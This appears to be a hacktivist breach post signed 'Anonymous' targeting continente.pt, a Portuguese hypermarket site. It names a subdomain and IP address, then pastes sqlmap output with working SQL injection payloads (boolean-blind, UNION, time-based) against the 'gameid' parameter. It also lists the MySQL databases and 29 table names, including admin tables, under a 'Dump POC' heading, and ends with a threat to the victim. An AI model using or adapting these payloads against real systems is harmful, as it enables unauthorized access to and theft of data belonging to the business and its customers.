- Hello,
- We are Anonymous and We are Inside your System, We are Unexpected
- Continente Hipermercado - Portugal
- Target --> Security ---> 0
- domain: continente.pt
- cname: popota.continente.pt A 212.0.160.211
- Exploit: SQL |--===--- injection
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: gameid
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: gameid=popomemoria' AND 6231=6231 AND 'PYbW'='PYbW
- Type: UNION query
- Title: MySQL UNION query (NULL) - 11 columns
- Payload: gameid=popomemoria' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71696d7871,0x766f6364506c6552714d,0x7169767471),NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: gameid=popomemoria' AND SLEEP(10) AND 'UzRE'='UzRE
- ---
- web application technology: Apache
- back-end DBMS: MySQL 5.0.11
- available databases [2]:
- [*] continente_popota
- [*] information_schema
- Database: continente_popota
- [29 tables]
- +----------------------------+
- | admin |
- | admin_passatempo |
- | cities |
- | event_calendar |
- | event_gallery |
- | hypnotic_albums |
- | hypnotic_items |
- | hypnotic_media |
- | hypnotic_photos |
- | languages |
- | music_studio_gallery |
- | participation |
- | participations |
- | participations_1 |
- | participations_2014 |
- | pastime_cast_participation |
- | pastime_cast_vote |
- | product |
- | product_category |
- | score |
- | share |
- | tour_gallery |
- | tour_locality |
- | tranlations |
- | vote |
- | votes |
- | votes_1 |
- | votes_2014 |
- | zones |
- +----------------------------+
- -- Dump POC:
- Database: continente_popota
- Table: admin
- [3 entries]
- do not forget, make the wrong move, and we have your information... game over :P
- Player 2
- 8====D